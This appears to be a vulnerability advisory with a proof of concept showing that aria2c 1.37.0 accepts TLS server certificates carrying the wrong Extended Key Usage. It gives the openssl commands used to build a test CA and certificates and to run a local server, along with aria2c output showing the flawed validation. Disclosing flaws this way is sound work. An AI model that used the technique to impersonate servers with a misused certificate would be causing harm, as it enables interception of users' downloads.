Tenable Research discovered that aria2c accepts a server certificate with incorrect Extended Key Usage (EKU). If the attackers compromise a certificate (with the associated private key) issued for a different purpose, they may be able to reuse it for TLS server authentication.
Proof of Concept
In this PoC, we will demonstrate generating private keys and the corresponding X.509 certificates, configuring a TLS server to use them, and then how aria2c fails to properly validate a certificate not meant to be used for TLS server authentication. In a real attack, the attackers would reuse the X.509 certificate and its corresponding key they managed to compromise.
Generate a set of RSA keys:
openssl genrsa -out ca-key.pem 2048
openssl genrsa -out server-key.pem 2048
Create an OpenSSL config:
cat openssl-ca.cfg
[ ca ]
keyUsage = critical,digitalSignature,keyCertSign,cRLSign
extendedKeyUsage = serverAuth,clientAuth
basicConstraints = critical,CA:TRUE
subjectKeyIdentifier = hash
authorityKeyIdentifier = keyid:always
[ server ]
keyUsage = critical,digitalSignature
extendedKeyUsage = serverAuth
basicConstraints = critical,CA:FALSE
subjectKeyIdentifier = hash
authorityKeyIdentifier = keyid:always
[ server-bad-eku ]
keyUsage = critical,digitalSignature
extendedKeyUsage = clientAuth
basicConstraints = critical,CA:FALSE
subjectKeyIdentifier = hash
authorityKeyIdentifier = keyid:always
Generate root CA certificate:
openssl req -x509 -new -key ca-key.pem -days 365 -out ca-cert.pem -subj “/CN=TestCA” -config openssl-ca.cfg -extensions ca
Generate a certificate signing request:
openssl req -new -key server-key.pem -out server.csr -subj “/CN=server” -addext “subjectAltName = DNS:localhost”
Generate a valid server certificate:
openssl x509 -req -CA ca-cert.pem -CAkey ca-key.pem -CAcreateserial -in server.csr -out server-cert.pem -days 365 -extfile openssl-ca.cfg -extensions server -copy_extensions copyall
Check EKU the generated certificate:
openssl x509 -text -noout -in server-cert.pem | grep -i ‘Extended Key Usage’ -A1
X509v3 Extended Key Usage:
TLS Web Server Authentication
Generate invalid server certificates with incorrect EKU:
openssl x509 -req -CA ca-cert.pem -CAkey ca-key.pem -CAcreateserial -in server.csr -out server-bad-eku-cert.pem -days 365 -extfile openssl-ca.cfg -extensions server-bad-eku -copy_extensions copyall
Check EKU in the generated certificate:
openssl x509 -text -noout -in server-bad-eku-cert.pem | grep -i ‘Extended Key Usage’ -A1
X509v3 Extended Key Usage:
TLS Web Client Authentication
Start a server using a valid server certificate:
openssl s_server -key server-key.pem -cert server-cert.pem -www -port 8080
Connection succeeds as expected:
aria2c –ca-certificate=ca-cert.pem https://localhost:8080
04/30 18:14:37 [NOTICE] Downloading 1 item(s)
04/30 18:14:37 [NOTICE] Download complete: /home/parallels/aria2c/index.html
Download Results:
gid |stat|avg speed |path/URI
======+====+===========+=======================================================
9bf002|OK | 588KiB/s|/home/parallels/aria2c/index.html
Status Legend:
(OK):download completed.
Start a server using a server certificate with incorrect EKU:
openssl s_server -key server-key.pem -cert server-bad-eku-cert.pem -www -port 8080
Connection succeeds while it shouldn’t:
aria2c –ca-certificate=ca-cert.pem https://localhost:8080
04/30 18:14:57 [NOTICE] Downloading 1 item(s)
04/30 18:14:57 [NOTICE] File already exists. Renamed to /home/parallels/aria2c/index.1.html.
04/30 18:14:57 [NOTICE] Download complete: /home/parallels/aria2c/index.1.html
Download Results:
gid |stat|avg speed |path/URI
======+====+===========+=======================================================
c6e101|OK | 673KiB/s|/home/parallels/aria2c/index.1.html
Status Legend:
(OK):download completed.
aria2c –ca-certificate=ca-cert.pem –check-certificate https://localhost:8080
04/30 18:15:07 [NOTICE] Downloading 1 item(s)
04/30 18:15:07 [NOTICE] File already exists. Renamed to /home/parallels/aria2c/index.2.html.
04/30 18:15:07 [NOTICE] Download complete: /home/parallels/aria2c/index.2.html
Download Results:
gid |stat|avg speed |path/URI
======+====+===========+=======================================================
686fe6|OK | 786KiB/s|/home/parallels/aria2c/index.2.html
Status Legend:
(OK):download completed.
aria2c –ca-certificate=ca-cert.pem –check-certificate=true https://localhost:8080
04/30 18:15:14 [NOTICE] Downloading 1 item(s)
04/30 18:15:14 [NOTICE] File already exists. Renamed to /home/parallels/aria2c/index.3.html.
04/30 18:15:14 [NOTICE] Download complete: /home/parallels/aria2c/index.3.html
Download Results:
gid |stat|avg speed |path/URI
======+====+===========+=======================================================
4a4aec|OK | 786KiB/s|/home/parallels/aria2c/index.3.html
Status Legend:
(OK):download completed.
Version of aria2c which was tested on Ubuntu 24.04:
aria2c –version | head -n 1
aria2 version 1.37.0
Other versions may be vulnerable too, but we have not validated additional versions.
